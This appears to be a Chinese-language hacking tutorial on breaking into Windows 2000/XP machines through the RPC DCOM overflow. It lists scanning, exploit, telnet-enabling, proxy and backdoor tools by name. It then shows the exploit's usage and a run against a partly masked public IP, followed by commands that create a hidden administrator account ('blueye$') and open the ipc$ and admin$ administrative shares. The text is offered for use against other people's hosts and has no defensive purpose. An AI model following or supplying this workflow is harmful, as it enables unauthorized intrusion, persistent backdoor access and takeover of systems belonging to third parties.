入侵工具dcomrpc
大家好,现在网上很流行dcomrpc,那好就说说利用dcomrpc入侵。很入侵之后做的事情。
需要的工具:
很好的: radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:WinEggDropShellPro3thVersion
好了,该做的都做的差不多了。
首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必
随便扫一下就会发现有许多主机开放的135端口)
211.217.50.xx 第一个主机就被扫出来又此漏洞。
看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下
其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2k server版本展开命令行:
[查看dcomrpc的用法 用法 dcomrpc -d <host> [options] ]
F:/hack>cd rpc/dcomrpc
RPC DCOM Expl01t coded by .:[oc192.us]:. Security
Complied and Modified by Expl01t www.longker.com
Usage:
dcomrpc -d <host> [options]
Options:
-d: Hostname to attack [Required]
-t: Type [Default: 0]
-r: Return address [Default: Selected from target]
-p: Attack port [Default: 135]
-l: Bindshell port [Default: 666]
Types:
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal]
开始进行溢出:
F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0
RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......
等到出现,说明溢出成功
c:/winnt/system32>
接着我们建立用户
c:/winnt/system32>net user blueye$ 1111 /add
命令成功完成。
把用户添加成超级管理员
c:/winnt/system32>net localgroup administrators blueye$ /add
命令成功完成。
看看共享开了没有没有的话把共享开开
c:/winnt/system32>net share
清单是空的。
c:/winnt/system32>net share ipc$
命令成功完成。
c:/winnt/system32>net share admin$
命令成功完成。
网友评论